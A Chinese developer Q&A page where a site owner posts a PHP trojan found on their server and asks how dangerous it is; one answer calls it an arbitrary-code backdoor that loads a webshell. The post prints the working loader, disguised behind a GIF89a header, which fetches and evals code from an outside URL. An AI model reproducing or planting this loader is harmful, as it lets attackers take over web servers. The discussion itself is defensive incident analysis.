网站扫描出木马文件，内容如下，破坏力如何？

Leon

16413

发布于
2023-03-06 河南

陟上晴明

22k145391

更新于
2023-03-06

Gif89a

<?php 
$c=&$cv;
$cv='http://www.sdcshr.com/style/admin/2.txt';
$b=file_get_contents($c);
@eval('?>'.`/******/`.$b);

请问上述域名和这个木马有关联吗，具体能造成多大破坏力。

php 安全漏洞

阅读 2.2k

3 个回答

得票最新

唯一丶

23.3k103743

发布于
2023-03-06 北京

破坏力很高。

简单的说，这是一个可以执行任意 PHP 代码的后门。

简单的说，就是这里会去执行 http://www.sdcshr.com/style/admin/2.txt 这个链接返回的代码，目前看起来，返回的是一个 webshell。

😮

查看全部 3 个回答

推荐问题

我想要可靠地升级网站，有没有标准的流程？或者需要注意的地方？
网上搜不到，不知道是不是我用的关键词不对。我用“网站升级流程”和“update website”在谷歌搜的。我还找了一本运维的书，结果扫了一眼目录和可能贴边的地方也没有。
2 回答1.6k 阅读✓ 已解决
cURL error 77: error setting certificate file: /etc/ssl/certs/ca-certificates.crt 如何处理?
php 报错 php 请求 [链接]我用的是swoole-cli openEuler {代码...} etc/ssl/certs/ 没有这个 ca-certificates.crt 文件尝试处理 {代码...} 以上处理均不生效，之前处理过同样的问题但是现在又出来了php curl 报77 报证书错误，和swoole-cli 没有关系，应该就是系统配置的问题，但是我不知道如何处理这个问题。
1 回答1.4k 阅读✓ 已解决
TP6指定时间段内填写指定内容？
使用框架：TP6根据时间段下发任务到用户，就是后台管理设定本月份要上报资料，然后用户在这个月的时间段里面就要上报指定资料。我完全没有思路，不知道有没有什么大神提供一下思路给我！！！我试过了订阅推送，但实际操作不太懂，也没有什么概念！
2 回答980 阅读✓ 已解决
小程序内跳转微信视频号直播，有什么官方支持方案？
目前我在研究是否能通过小程序跳转视频号直播，比如 wx.openBusinessView、navigateToMiniProgram 或其他能力，但资料较为分散，没看到完整的官方流程或文档。
2 回答1.1k 阅读
这个匹配@用户的正则怎么写?
php代码中$markdownText中是文本内容，其中“@用户1” 要解析为 “@用户1” 的格式，对于已经解析成这个格式的文本中的 “@用户1” 不进行匹配，仅匹配不在这个格式内的 “@用户1” 格式，其中这个 “@用户1” 格式中，“[” 后面可以跟着0或多个空格，然后0或者一个换行，"@"符号之前可以有0或多个空格，"]"之前可以跟着0或者一个换...
1 回答926 阅读
mongodb两个表联查字段不显示？
用thinkphp5操作mongodb数据，在做联合查询的时候，第二个表中的字段获取老是不显示出来？请教高手如何获取出来？
1 回答884 阅读
php如何匹配markdown中能解析的图片格式?
问题如图求解
1 回答879 阅读

相似问题

scandir和glob都只能扫描出文件夹，扫描不出文件
1 回答2.6k 阅读
如何防止别人用漏洞扫描工具扫描网站
1 回答6.4k 阅读
报告如下，公司项目被安全公司扫描出的“HTTP头信息泄露”，如何修改？
2 回答2.9k 阅读✓ 已解决
sql如何获取查询扫描的行数？能否指定范围扫描？
1 回答2.8k 阅读✓ 已解决
我的wordpress网站被挂了后门，请问如何找出后门？
1 回答2.9k 阅读✓ 已解决

找不到问题？创建新问题

网站扫描出木马文件，内容如下，破坏力如何？

我想要可靠地升级网站，有没有标准的流程？或者需要注意的地方？

cURL error 77: error setting certificate file: /etc/ssl/certs/ca-certificates.crt 如何处理?

TP6指定时间段内填写指定内容？

小程序内跳转微信视频号直播，有什么官方支持方案？

这个匹配@用户的正则怎么写?

mongodb两个表联查字段不显示？

php如何匹配markdown中能解析的图片格式?